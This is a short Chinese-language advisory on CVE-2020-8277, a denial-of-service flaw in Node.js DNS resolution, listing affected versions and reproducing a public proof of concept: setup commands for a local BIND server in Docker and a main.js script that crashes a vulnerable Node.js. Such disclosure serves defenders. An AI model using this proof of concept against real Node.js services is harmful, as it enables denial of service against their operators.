近日,Node.js官方发布最新安全版本公告,披露在v12.x,v14.x和v15.x 相应的Node.js版本中存在一处高风险的拒绝服务漏洞(CVE-2020-8277)。受影响的Node.js应用允许攻击者对目标主机发送DNS请求,利用Node.js应用解析大量响应的DNS记录来对目标主机实现拒绝服务攻击。
影响版本:
- Node.js 12.x: 12.16.3-12.19.1
- Node.js 14.x: 14.13.0-14.15.1
- Node.js 15.x全部版本
Quick Run:
# clone this repository
$ git clone https://github.com/masahiro331/CVE-2020-8277
# run bind
$ docker build -t bind-local ./bind
# Need TCP fallback
$ docker run --rm --name bind -it -p 53:53 -p 53:53/udp bind
# use "< v15.2.1" version
# If you use fixed version, build node.
$ git clone https://github.com/nodejs/node
$ git checkout df211208c0
$ ./configure
$ make -j8
$ make install
# Run PoC
$ node main.jsmain.js:
// const SegfaultHandler = require('segfault-handler');
// SegfaultHandler.registerHandler('crash.log');
const { Resolver } = require('dns');
const resolver = new Resolver();
resolver.setServers(['127.0.0.1']);
x = 0
resolver.resolve4('safe.masahiro331.com', (err, addresses) => {
while (x < 1000) {
console.log(x);
console.log(addresses[x])
x += 1;
}
console.log(err);
});ref:
https://github.com/masahiro331/CVE-2020-8277